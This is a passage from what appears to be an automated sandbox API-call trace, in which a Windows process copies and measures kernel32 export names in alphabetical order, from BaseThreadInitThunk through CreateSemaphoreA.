lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.970] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.971] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.971] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.971] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.971] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.971] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.971] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.971] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.971] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.971] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.971] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.971] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.971] lstrlenA (lpString="BEEP") returned 4 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.971] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.971] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.971] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.971] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.971] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.971] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.971] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.971] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.972] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.972] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.972] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.972] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.972] lstrlenA (lpString="CANCELIO") returned 8 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.972] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.972] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.972] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.972] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.972] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.972] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.972] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.972] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.972] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.972] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.972] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.972] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.972] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.972] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.972] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.973] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.973] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.973] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.973] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.973] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.973] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.973] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.973] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.973] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.973] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.973] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.973] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.973] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.973] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.973] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.973] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.973] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.973] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.973] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.973] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.974] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.974] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.974] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.974] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.974] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.974] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.974] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.974] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.974] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.974] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.974] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.974] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.974] lstrlenA (lpString="COPYFILEA") returned 9 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.974] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.974] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.974] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.974] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.974] lstrlenA (lpString="COPYFILEW") returned 9 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.974] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.974] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.975] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.975] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.975] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.975] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.975] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.975] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.975] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.975] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.975] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.975] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.975] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.975] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.975] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.975] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.975] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.975] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.975] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.975] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.975] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.975] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.976] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.976] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.976] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.976] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.976] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.976] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.976] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.976] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.976] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.976] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.976] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.976] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.976] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.976] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.976] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.976] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.976] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.976] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.976] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.976] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.977] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.977] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.977] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.977] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.977] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.977] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.977] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.977] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.977] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.977] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.977] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.977] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.977] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.977] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") 